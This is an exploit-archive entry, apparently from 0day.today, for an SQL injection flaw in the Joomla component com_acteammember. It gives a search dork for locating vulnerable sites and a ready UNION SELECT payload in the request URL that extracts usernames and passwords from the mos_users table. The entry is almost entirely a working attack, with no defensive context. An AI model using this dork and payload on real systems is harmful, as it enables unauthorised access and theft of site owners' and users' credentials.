id: 10955
date: 02/17/2010
title: Joomla Component com_acteammember SQL Injection Vulnerability
author: altbta
cves: 

=============================================================
Joomla Component com_acteammember SQL Injection Vulnerability
=============================================================

Joomla Component com_acteammember Sql Injection Vulnerability
==============================================================
 
####################################################################
.:. Author : altbta 

.:. Dork : inurl:"com_acteammember"
 
####################################################################
 
===[ Exploit ]===
 
www.site.com/index.php?option=com_acteammember&id=[SQL]&Itemid=121&lang=en
 
 
http://server/index.php?option=com_acteammember&id=-1+UNION+SELECT+1,2,3,4,5,concat(username,0x20,password),7,8,9,10,11,12,13,14,15+from+mos_users--&Itemid=121&lang=en
 
 
####################################################################



#  0day.today [2023-03-25]  #